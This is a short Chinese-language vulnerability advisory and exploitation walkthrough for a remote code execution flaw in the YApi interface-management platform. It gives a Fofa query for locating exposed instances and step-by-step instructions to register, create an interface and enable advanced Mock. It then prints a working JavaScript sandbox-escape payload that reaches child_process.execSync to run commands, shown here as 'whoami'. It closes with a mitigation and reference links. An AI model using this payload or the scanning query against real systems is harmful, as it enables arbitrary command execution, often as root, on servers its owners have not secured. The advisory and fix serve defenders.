漏洞描述
YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。鉴于该漏洞目前处于0day漏洞利用状态,强烈建议客户尽快采取缓解措施以避免受此漏洞影响
Fofa
app="YApi"
1.主界面
2.默认开启注册功能,注册新用户
3.点击加号新建项目
4.添加接口
5.选择高级Mock-》开启-》写入POC
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()
6.进入预览,点击Mock地址链接
7.查看结果权限为root
解决方案
Yapi作者已经停止更新。临时修复建议禁止用户注册,具体配置参考原文链接:
https://hellosean1025.github.io/yapi/devops/index.html#禁止注册
参考链接
https://mp.weixin.qq.com/s/y_oMGPvgL9Mm4IVDb6RjxA